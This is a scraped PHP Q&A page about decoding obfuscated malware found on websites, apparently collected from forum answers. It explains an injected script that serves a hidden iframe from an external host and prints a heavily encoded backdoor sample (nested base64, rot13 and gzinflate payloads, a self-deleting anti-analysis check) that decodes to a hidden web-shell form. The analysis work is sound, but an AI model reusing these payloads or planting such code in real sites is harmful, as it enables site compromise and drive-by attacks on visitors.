How to Decode Eval( Gzinflate( Base64_Decode(

How to decode eval( gzinflate( base64_decode(

This should output the code that would be executed by eval():

<?php
echo gzinflate( base64_decode( /* insert code */ ));
?>

I hope that's what you were looking for.

What this Code Is Doing? eval(gzinflate(base64_decode Hack

if (!defined('frmDs')){
define('frmDs' ,1);

This check if the frmDs variable exists, I think to prevent the script to be executed twice (it would give an error if you define the same functions twice).

After the functions definitions, the first block of code that is executed is
$ua = $_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) ){
error_reporting(0);

    if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm() ) {
        @setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
        print($nfc);
    }
}

In the block of code above, it checks if the user has the cookie __utmfr, if not this is set and the result of frm_getfrm() is printed to the web output.

In other words, if the user is visiting the site for the first time, he get the result of frm_getfrm() at the beginning of his HTML page.

The functon frm_getfrm() is complicate, but at the end of the day it try to return an hidden IFRAME with the content from the external website http://kchergnrxp.myfw.us/nc/gnc.php?ver=jquery.latest.js in the case your hosting server can't connect to an external server.
If your server can connect to an external server, the script use the PHP builtin function to download the content of http://kchergnrxp.myfw.us/nc/gnc.php?ver=jquery.latest.js and returns it.

Can anyone decode this? (eval(hex2bin(str_rot13(gzinflate(str_rot13(base64_decode

decode it ..

error_reporting(0);
define('__LOCALFILE__', __FILE__);
define('HELLO', fopen(__FILE__, 'r'));
fseek(HELLO, __COMPILER_HALT_OFFSET__);
$a = "\x68"; // h
$b = "\x65"; // e
$c = "\x78"; // x
$d = "\x32"; // 2
$e = "\x62"; // b
$f = "\x69"; // i
$g = "\x6e"; // n
$aNjE4NjIwNDEzd = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65"; // base64_decode
$kMTUwNjIyNTU5s = "$a$b$c$d$e$f$g"; // hex2bin
$det = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";  // str_rot13
$gODY5MjczNzY2f = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; // str_rot13
$wMTQ4NjQyMzE0z = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; // gzinflate
$aNjE4NjIwNDEzd = 'base64_decode';
$kMTUwNjIyNTU5s = 'hex2bin';
$det = $gODY5MjczNzY2f = 'str_rot13';
$wMTQ4NjQyMzE0z = 'gzinflate';
// first
echo $kMTUwNjIyNTU5s($det($wMTQ4NjQyMzE0z($gODY5MjczNzY2f($aNjE4NjIwNDEzd('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')))));
$devil = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65";
$det = "9pQfJowOh_^\]..XYk_^\]..C%%lo^>uJX__%..[0Vmc#kufetaw#AC%%lo^>#kufetaw#k#kufetaw#C7kSY0FGZkwi%%lo^>uJCLiMya8NXYj%%lo^>CKlNWYsBXZy9lc0NH%%lo^>9ASY0FGZkAC%%lo^>#kufetaw#ASCKsTKh_^\]..XYk_^\]..CLicm%%lo^>s%%lo^>y%%lo^>8N3cr__%..[#ysae#XfNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D%%lo^>h_^\]..XYk_^\]..SCJowe#kufetaw#kSY0FGZk#kufetaw#SY0FGZlNWYsBXZyBibvlG__%..[j5W__%..[ml#kufetaw#C7V2csVWfKsTKi#kufetaw#1XYJCKllGZJowOp81XFxUSGxUQD9ETf9FKr5Was5W__%..[JowepkSZslmZkwyJvQ#ysae#bpJHcvcCKoNG__%..[h12X#ysae#VmcwBicvBSKlxWam_^\]..CL#ysae#8yboNWZvcCKoNG__%..[h12X#ysae#VmcwhiZppwOp81XFxUSGxUQD9ETf9FK%_____^\]..#ysae#bl_^\]..#ysae#bvN2X0V2ZfVGbpZG%%lo^>9ASZslmZkowOpADK#ysae#5Wa0J3bwVmcfJ3byJXZKAHaw9DP";
$scream = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65"; // base64_decode
$cet = "+8%____OpkC__%..[l_^\]..GJowWa2VGZk4i%%lo^>+8j%%lo^>owWY2VGQ7kC__%..[l_^\]..GJs%%lo^>CZiwyJf9VJu4yW#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>SSiwi%%lo^>lUCbv5lPi#kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>iUiwyJf5FX__%..[5iL#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>ieiwi%%lo^>l81Xf9l%%lo^>oU2YhxGclJ3Xy_^\]..3c9QXZk_^\]..yOpQXZk_^\]..CLi4m%%lo^>s%%lo^>y%%lo^>5NXYlNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>yZiwi%%lo^>jsW__%..[mVG__%..[h__%..[3%%lo^>i#kufetaw#SZjFGbwVmcfJH__%..[%____BSP0VGZksTK0VGZk#kufetaw#i__%..[lJ#ysae#c0NXP0VGZkAyLqAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AiC#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#%%lo^>CU4#kufetaw#DO4#kufetaw#TWiAC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>iAFO4#kufetaw#DOZJC%%lo^>#kufetaw#Ai%%lo^>QhDO4#kufetaw#TWiACO4#kufetaw#DO4#kufetaw#DOKAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AFO4QmL#kufetaw#4iY4#kufetaw#TW#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>QhDOkBC%%lo^>ihDOZBCU4#kufetaw#DZ#kufetaw#AiY4#kufetaw#TW#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4%%lo^>C%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#Ai%%lo^>QhDO4#kufetaw#DO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiLihDOZJC%%lo^>#kufetaw#AC%%lo^>#kufetaw#%%lo^>GO4kl%%lo^>#kufetaw#AFO4#kufetaw#D%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>KACU4#kufetaw#DZ#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4#kufetaw#DO4#kufetaw#DO4#kufetaw#D%%lo^>#kufetaw#AiLihDO4kl%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DZ4#kufetaw#DO#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4kF%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>ihDOZJC%%lo^>iAFO4QG%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiY4#kufetaw#TW#kufetaw#ACU4#kufetaw#DZ#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#AFO4QG%%lo^>#kufetaw##kufetaw#DO4#kufetaw#DZKAC%%lo^>u%%lo^>GO4#kufetaw#DO4#kufetaw#DO#kufetaw#AiLihDO4#kufetaw#DOk5C%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#4iY4#kufetaw#DO4QmL#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DOk5C%%lo^>#kufetaw#ACO4#kufetaw#DZ#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#oyL#kufetaw#AHaw9DP";
$a = "\x68";
$b = "\x65";
$c = "\x78";
$d = "\x32";
$e = "\x62";
$f = "\x69";
$g = "\x6e";
$h = "\x3F\x3E"; // >
$aOTE0MzE5NjM0d = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65"; // base64_decode
$kNjM3ODM3ODA4s = 'hex2bin';
$lMjEwMzY5OTkwc = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; // str_rot13
$gMTkzNDAzMDE5f = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; // str_rot13
$wOTAxMTUxNjYxz = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; // gzinflate
$aOTE0MzE5NjM0d = 'base64_decode';
$kNjM3ODM3ODA4s = 'hex2bin';
$lMjEwMzY5OTkwc = $gMTkzNDAzMDE5f = 'str_rot13';
$wOTAxMTUxNjYxz = 'gzinflate';
//second
// echo $kNjM3ODM3ODA4s($lMjEwMzY5OTkwc($wOTAxMTUxNjYxz($gMTkzNDAzMDE5f($aOTE0MzE5NjM0d('xUdbksQgCLySAYHkRWzo/asWWYya0p2d/HnxMVDbNtBLwR2jOJ7FgYMIK7gcQf+zx9niwk/OZHOAMFObW2hJZJ/sJ+rWwrX8zCgp0mUxB3W//s1IBkCfXUO3tr23mjlhfqjRfv2nTx/PTL9+9qSqa1pFcK2j39QvfvbrRkjRXLoDdyfezJ/j2s8H/7vbgN8d/Zv/9fuvz+qZi1h9tF+/bCtuxC71n/srmy4u9dGhShVqxGHn/6dL9VvkwDMyicdQQ7yAgHMMZsZuwa1jwJ0sionna+fJzpSvD1CEJ/FZzE+8ASq2A7Ck3xdtqjTp+WUrhbHSS4fiGUCniqwvR1HfRqCDaQqqJKZwZd9qg4ECVN71+tWPX970UJtoBJQmWP2wf+prdLvUO3uqHNH8C+AFGVpEQo5t02nHSz8=')))));
$cet = "+8%____OpkC__%..[l_^\]..GJowWa2VGZk4i%%lo^>+8j%%lo^>owWY2VGQ7kC__%..[l_^\]..GJs%%lo^>CZiwyJf9VJu4yW#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>SSiwi%%lo^>lUCbv5lPi#kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>iUiwyJf5FX__%..[5iL#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>ieiwi%%lo^>l81Xf9l%%lo^>oU2YhxGclJ3Xy_^\]..3c9QXZk_^\]..yOpQXZk_^\]..CLi4m%%lo^>s%%lo^>y%%lo^>5NXYlNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>yZiwi%%lo^>jsW__%..[mVG__%..[h__%..[3%%lo^>i#kufetaw#SZjFGbwVmcfJH__%..[%____BSP0VGZksTK0VGZk#kufetaw#i__%..[lJ#ysae#c0NXP0VGZkAyLqAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AiC#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#%%lo^>CU4#kufetaw#DO4#kufetaw#TWiAC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>iAFO4#kufetaw#DOZJC%%lo^>#kufetaw#Ai%%lo^>QhDO4#kufetaw#TWiACO4#kufetaw#DO4#kufetaw#DOKAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AFO4QmL#kufetaw#4iY4#kufetaw#TW#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>QhDOkBC%%lo^>ihDOZBCU4#kufetaw#DZ#kufetaw#AiY4#kufetaw#TW#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4%%lo^>C%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#Ai%%lo^>QhDO4#kufetaw#DO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiLihDOZJC%%lo^>#kufetaw#AC%%lo^>#kufetaw#%%lo^>GO4kl%%lo^>#kufetaw#AFO4#kufetaw#D%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>KACU4#kufetaw#DZ#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4#kufetaw#DO4#kufetaw#DO4#kufetaw#D%%lo^>#kufetaw#AiLihDO4kl%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DZ4#kufetaw#DO#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4kF%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>ihDOZJC%%lo^>iAFO4QG%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiY4#kufetaw#TW#kufetaw#ACU4#kufetaw#DZ#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#AFO4QG%%lo^>#kufetaw##kufetaw#DO4#kufetaw#DZKAC%%lo^>u%%lo^>GO4#kufetaw#DO4#kufetaw#DO#kufetaw#AiLihDO4#kufetaw#DOk5C%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#4iY4#kufetaw#DO4QmL#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DOk5C%%lo^>#kufetaw#ACO4#kufetaw#DZ#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#oyL#kufetaw#AHaw9DP";
$cet = strrev($cet);
$cet = str_replace('#watefuk#', 'g', $cet);
$cet = str_replace('#easy#', 'n', $cet);
$cet = str_replace('____%', 'z', $cet);
$cet = str_replace('..]\^_', 'R', $cet);
$cet = str_replace('>^ol%%', 'I', $cet);
$cet = str_replace('[..%__', 'd', $cet);
echo base64_decode($cet);
//third
$det = "9pQfJowOh_^\]..XYk_^\]..C%%lo^>uJX__%..[0Vmc#kufetaw#AC%%lo^>#kufetaw#k#kufetaw#C7kSY0FGZkwi%%lo^>uJCLiMya8NXYj%%lo^>CKlNWYsBXZy9lc0NH%%lo^>9ASY0FGZkAC%%lo^>#kufetaw#ASCKsTKh_^\]..XYk_^\]..CLicm%%lo^>s%%lo^>y%%lo^>8N3cr__%..[#ysae#XfNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D%%lo^>h_^\]..XYk_^\]..SCJowe#kufetaw#kSY0FGZk#kufetaw#SY0FGZlNWYsBXZyBibvlG__%..[j5W__%..[ml#kufetaw#C7V2csVWfKsTKi#kufetaw#1XYJCKllGZJowOp81XFxUSGxUQD9ETf9FKr5Was5W__%..[JowepkSZslmZkwyJvQ#ysae#bpJHcvcCKoNG__%..[h12X#ysae#VmcwBicvBSKlxWam_^\]..CL#ysae#8yboNWZvcCKoNG__%..[h12X#ysae#VmcwhiZppwOp81XFxUSGxUQD9ETf9FK%_____^\]..#ysae#bl_^\]..#ysae#bvN2X0V2ZfVGbpZG%%lo^>9ASZslmZkowOpADK#ysae#5Wa0J3bwVmcfJ3byJXZKAHaw9DP";
$det = strrev($det);
$det = str_replace('#watefuk#', 'g', $det);
$det = str_replace('#easy#', 'n', $det);
$det = str_replace('____%', 'z', $det);
$det = str_replace('..]\^_', 'R', $det);
$det = str_replace('>^ol%%', 'I', $det);
$det = str_replace('[..%__', 'd', $det);
echo base64_decode($det);

//forth
error_reporting(0);
$file = file_get_contents(__LOCALFILE__);
if (preg_match('/echo/', $file) or preg_match('/print/', $file)) {
    unlink(__LOCALFILE__);
    exit('X_X');
}
function replacedata($data)
{
    $data = str_replace('#_^wkss|#', 'g', $data);
    $data = str_replace('#as|k#', 'n', $data);

    return $data;
}

How to decode suspicious PHP file

If I understood your question correct, I believe you want to know what the code will return. It translates to:

<form method="post" action=""><input type="text"name="WP_g_"value=""/><input type="submit"value=">"/></form>


Related Topics

Switching Between Http and Https Pages with Secure Session-Cookie

Parsing JSON Array with PHP Foreach

Mysql: Add Sequence Column Based on Another Field

PHP How to Import All Classes from Another Namespace

How Does Similar_Text Work

Redirecting to Authentication Dialog - "An Error Occurred. Please Try Again Later"

Is HTMLentities() Sufficient for Creating Xml-Safe Values

How to Pass Variables as Stdin into Command Line from PHP

In PHP, How to Extract Multiple E-Mail Addresses from a Block of Text and Put Them into an Array

How to Insert an Array into a Single MySQL Prepared Statement W/ PHP and Pdo

Symfony2, Dynamic Db Connection/Early Override of Doctrine Service

PHP Header Redirect in a New Window

How to Add Some Textfield in Form Register (Laravel Generator Infyom)

How to Pass Js Variable to PHP

Ip Address Storing in MySQL Database Using PHP

Insert Current Date in Datetime Format MySQL

How to Store an Array into MySQL

PHP Flush That Works... Even in Nginx


Leave a reply



Submit